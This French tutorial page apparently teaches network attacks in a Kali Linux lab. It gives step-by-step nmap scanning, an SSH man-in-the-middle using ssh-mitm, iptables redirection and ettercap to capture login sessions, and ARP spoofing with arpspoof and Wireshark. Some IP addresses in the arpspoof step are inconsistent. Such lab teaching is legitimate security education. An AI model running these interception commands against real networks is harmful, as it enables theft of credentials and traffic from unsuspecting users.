Utilisation de Utilisation de Kali
Utilisation de Kali[modifier | modifier le wikicode]
Découverte des hôtes et services présents sur un réseau local[modifier | modifier le wikicode]
En tant qu’attaquant, la première étape consiste à recueillir des informations sur le réseau dans lequel nous nous trouvons. Ainsi, à l’aide de l’outil nmap présent sur Kali Linux :
Réaliser un scan du réseau[modifier | modifier le wikicode]
sudo nmap -sP 192.168.56.0/24
Scanner un hôtes[modifier | modifier le wikicode]
Afin de savoir quels ports sont ouverts sur ceux-ci et quels services sont proposés
sudo nmap -sV 192.168.56.10
Faire Attaque MITM d’un service SSH[modifier | modifier le wikicode]
Se déplacer dans le répertoire ssh-mitm
cd ssh-mitm
lancer le service ssh-mitm
sudo ./start.sh
activer le routage
sudo sysctl -w net.ipv4.ip_forward=1
Configurer redirection de ports afin de rediriger tous les flux à destination de la machine attaquante sur le port 22/TCP vers le port 2222 du système Kali Linux
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
Lancer attaque avec la commande ettercap
sudo ettercap -i eth0 -T -M arp /192.168.56.10// /192.168.56.11//
• -T : lance ettercap en mode texte ; • -M : indique que l'on veut une attaque de type "Man in the middle" ; • 192.168.56.10 (serveur ssh) et 192.168.56.11 (client SSH) sont les adresses IP des victimes
Sur le poste de l’attaquant (Kali), il faut d’arrêter l’attaque ARP Spoofing, taper la touche Q pour arrêter.
arrêter le service ssh-mitm :
sudo ./stop.sh
Aller chercher les information de connexion avec la commande suivante :
sudo nano /home/ssh-mitm/shell_session_0.txt
Faire une Attaque ARP spoofing[modifier | modifier le wikicode]
Mise en œuvre de l’attaque[modifier | modifier le wikicode]
Outils à utiliser sur le système attaquant ;
- Wireshark permettant d’analyser les trames transitant par le système attaquant.
- Outil arpspoof permettant d’usurper les communications de couches 2 et 3 (respectivement Ethernet et IPV4). L’installation se fait avec la commande.
Installer le paquet dsniff
sudo apt install dsniff
activer le routage
L’attaquant doit prendre le rôle d’un routeur et doit être paramétré en conséquence. On doit donc positionner le paramètre d’environnement “forwarding” à la valeur “1” avec la commande :
sudo sysctl -w net.ipv4.conf.all.forwarding=1
Vérifier que le paramètre “forwarding” est bien positionné :
sudo sysctl net.ipv4.conf.all.forwarding
la commande doit retourner la valeur 1
Mener l’attaque d’ARP spoofing sur l’utilisateur et la gateway[modifier | modifier le wikicode]
Avant de lancer l’ARP Spoofing, nous allons vérifier le trafic transitant par l’attaquant en lançant l’analyseur de paquets WireShark :
Sur l’attaquant en mode graphique lancer wireshark en indiquant l’interface d’écoute, dans l’exemple l’interface est « eth0 »:
sudo wireshark -ki eth0
Les commandes à renseigner sur l’attaquant pour l’arpspoofing sont les suivantes :
sudo arpspoof -t 192.168.56.10 192.168.10.254 sudo arpspoof -t 192.168.56.254 192.168.10.10
△ Attention, chaque commande doit être lancée dans une session distincte de l’attaquant, car l’exécution d’un processus peut bloquer la saisie d’une autre commande au sein de la même session.
Maintenant via wiresharp vous voyer toutes les trames qui transites entre le routeur et l'utilisateur.